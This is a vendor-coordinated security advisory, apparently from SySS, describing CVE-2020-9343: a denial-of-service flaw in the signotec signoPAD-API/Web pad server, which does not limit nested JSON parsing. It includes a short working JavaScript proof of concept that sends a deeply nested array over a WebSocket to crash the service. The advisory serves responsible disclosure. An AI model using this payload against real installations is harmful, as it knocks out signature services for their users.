Advisory ID: SYSS-2019-053
Product: signotec signoPAD-API/Web (formerly: Websocket Pad Server) - Windows
Manufacturer: signotec GmbH
Affected Version(s): 1.6.2, 3.1.0
Tested Version(s): 1.6.2, 3.1.0
Vulnerability Type: Denial of Service
Risk Level: Medium
Solution Status: Solved
Manufacturer Notification: 20. December 2019
Solution Date: 10. February 2020
CVE Reference: CVE-2020-9343
Author of Advisory: Marius Rothenbücher, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

signotec signoPAD-API/Web is a web API for communicating with signature
pads using web sockets.

The manufacturer describes the product as follows (see [1]):

"The signotec WebSocket Pad Server is a solution for communicating from
a web application to signotec signature pads without the need for a
browser plug-in."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to perform a Denial of Service attack because the
implementation doesn't limit the parsing of nested JSON structures.
If a victim visits a website which is under control of an attacker,
this vulnerability can be exploited.

An attacker can crash the web API by sending a deeply nested array in a
JSON structure to a web socket.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following PoC shows, how to crash the web API using e deeply nested
array within a JSON structure.

#### PoC.. ############
<script>
  var webSocket = new WebSocket("wss://local.signotecwebsocket.de:49494");
  
  webSocket.onopen = function (event) {
    var nest = ""
    for (i=0; i < 31337; i++) {
       nest = "["+nest+"]"
    }

    webSocket.send('{"":'+nest+'}');
  }
</script>
#### ..PoC ############

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update the software to the newest version. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-12-20: Vulnerability discovered
2019-12-20: Vulnerability reported to manufacturer
2020-02-10: Patch released by manufacturer
2020-02-24: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for signotec signoPAD-API/Web (formerly: Websocket Pad Server) - Windows
    https://en.signotec.com/portal/seiten/signotec-signopad-api-web-formerly-websocket-pad-server--900000547-10002.html
[2] SySS Security Advisory SYSS-2019-053
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-053.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Marius Rothenbücher of SySS
GmbH.

E-Mail: marius.rothenbuecher (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Marius_Rothenbuecher.asc
Key Fingerprint: 615E F88B 7C62 78D6 3EA5 9B78 09F8 9FFF 4941 B8E2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en